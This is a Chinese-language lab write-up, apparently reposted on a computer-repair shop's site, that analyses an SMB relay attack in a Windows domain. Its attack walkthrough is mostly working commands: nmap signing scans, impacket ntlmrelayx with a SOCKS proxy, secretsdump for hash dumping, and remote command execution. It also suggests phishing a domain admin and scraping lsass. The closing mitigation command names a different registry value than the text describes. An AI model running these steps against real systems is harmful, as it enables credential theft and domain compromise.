锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务,锦州广厦维修电脑,公司IT外包服务
topFlag1 设为首页
topFlag3 收藏本站
 
maojin003 首 页 公司介绍 服务项目 服务报价 维修流程 IT外包服务 服务器维护 技术文章 常见故障
锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务技术文章
Windows SMB请求重放攻击分析

作者: 佚名  日期:2018-07-10 18:05:05   来源: 本站整理

前言
smb中继或叫smb请求重放攻击,B是一个smb服务器,A来进行认证,B将A的认证信息转发到C上,如果A的凭证在C上认证成功就能进行下一步操作,如创建服务执行命令。如果在域中控制了某些常用服务,如:WEB OA系统、文件共享等服务则可以尝试使用SMB中继攻击来引诱域管理员访问达到获取其他机器权限的目的。

环境
192.168.123.10 win 7  域管理员(administrator)机器
192.168.123.11 kali linux 攻击者机器
192.168.123.100 域内普通用户-受害者机器
攻击演示
需要smb签名关闭下才能进行利用,只有windows server的smb签名是默认开启的,像Windows 7的签名默认关闭
可以用nmap探测smb是否关闭
nmap --script smb-security-mode.nse -p445 192.168.123.0/24 --open

下载impacket工具包
git clone https://github.com/CoreSecurity/impacket.git
192.168.123.11(攻击者机器) 执行
ntlmrelayx.py -tf hosts.txt -socks -smb2support
hosts.txt里面的内容是要进行中继的IP,机器越多成功率越高,我这里只有一个IP

然后让192.168.123.10(域管理员机器) 访问192.168.123.11(攻击者机器)的共享,可以架设一个web服务器,html页面里嵌入\\攻击者地址,我这里为了方便演示就在本地写一个html

192.168.123.10(域管理员机器)访问共享时,提示如下说明中继成功

[*] Authenticating against smb://192.168.123.100 as Z3R0\Administrator SUCCEED [*] SOCKS: Adding Z3R0/ADMINISTRATOR@192.168.123.100(445) to active SOCKS connection. Enjoy
然后在本地会创建一个socks4代理
在 /etc/proxychains.conf 的最后一行填入
socks4  192.168.123.11 1080
配置好socks4代理后攻击者执行
proxychains python secretsdump.py z3r0/Administrator@192.168.123.100
这样secretsdump.py发送出的认证数据包经过socks4代理中继就能成功进行认证

如果不加上其他参数的话ntlmrelayx.py默认会dumphash

先看看视频效果图
上传时 freebuf提示图片超出大小限制(希望小编能处理下:) ),效果图地址:/article/UploadPic/2018-7/2018710164730287.gif
原理分析
每一步smb请求都被192.168.123.11(攻击者机器)转发到了其他机器上

1. 192.168.123.10(域管理员机器)向192.168.123.11(攻击者机器)商量smb协议版本

2. 192.168.123.11(攻击者机器)向192.168.123.100(受害者机器)商量smb协议版本
3.192.168.123.100(受害者机器)向192.168.123.11(攻击者机器)回答支持smb v2

4.192.168.123.11(攻击者机器)向192.168.123.10(域管理员机器)回答支持smb v2
协商完就开始认证了

1.192.168.123.10(域管理员机器)向192.168.123.11(攻击者机器)发出NTLMSSP_NEGOTIATE认证协商请求
2.192.168.123.11(攻击者机器)向192.168.123.100(受害者机器)发出NTLMSSP_NEGOTIATE认证协商请求
3.192.168.123.100(受害者机器)向192.168.123.11(攻击者机器)进行响应,响应包里含有challenge

4.同样192.168.123.11(攻击者机器)向192.168.123.10(域管理员机器)进行响应,响应包里含有challenge5.192.168.123.10(域管理员机器)收到challenge后用hash将challenge加密,作为NTLM Response字段发送给192.168.123.11(攻击者机器)

6.同样,192.168.123.11(攻击者机器)将域管理员的认证请求也发往192.168.123.100(受害者机器)

在响应包中可以看到已经认证成功了

有了管理员权限就能为所欲为了

因为没有目标机器密码所以不能进行正常的smb认证,ntlmrelayx脚本的socks4代理作用就是处理本地发往192.168.123.100 (受害者机器)流量起一个中继作用,因为已经认证过了就不用再进行认证,密码随便填一个就行,使用socks4代理时的smb的身份认证是域管理员。
可以通过创建服务来执行命令,当然ntlmrelayx.py也可以做到.
python ntlmrelayx.py -tf hosts.txt -c 'cmexe /c calc.exe'

当192.168.123.10(域管理员机器)再次访问共享时,192.168.123.100(受害者机器)上可以看到calc已经运行了

总结
1.可以通过给域管理员发送邮件的方式来让他触发smb请求
2.当然如果域管理员触发了smb中继请求了也可以针对他所在那一台机器做中继,这样就能执行命令抓lsass.exe进程中的明文密码了
修复建议
将注册表项”RequireSecuritySignature”设置为 1 可以启用 SMB 签名
powershell执行
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" RequireSecureNegotiate -Value 1 –Force
 



热门文章
  • 机械革命S1 PRO-02 开机不显示 黑...
  • 联想ThinkPad NM-C641上电掉电点不...
  • 三星一体激光打印机SCX-4521F维修...
  • 通过串口命令查看EMMC擦写次数和判...
  • IIS 8 开启 GZIP压缩来减少网络请求...
  • 索尼kd-49x7500e背光一半暗且闪烁 ...
  • 楼宇对讲门禁读卡异常维修,读卡芯...
  • 新款海信电视机始终停留在开机界面...
  • 常见打印机清零步骤
  • 安装驱动时提示不包含数字签名的解...
  • 共享打印机需要密码的解决方法
  • 图解Windows 7系统快速共享打印机的...
  • 锦州广厦电脑上门维修

    报修电话:13840665804  QQ:174984393 (联系人:毛先生)   
    E-Mail:174984393@qq.com
    维修中心地址:锦州广厦电脑城
    ICP备案/许可证号:辽ICP备2023002984号-1
    上门服务区域: 辽宁锦州市区
    主要业务: 修电脑,电脑修理,电脑维护,上门维修电脑,黑屏蓝屏死机故障排除,无线上网设置,IT服务外包,局域网组建,ADSL共享上网,路由器设置,数据恢复,密码破解,光盘刻录制作等服务

    技术支持:微软等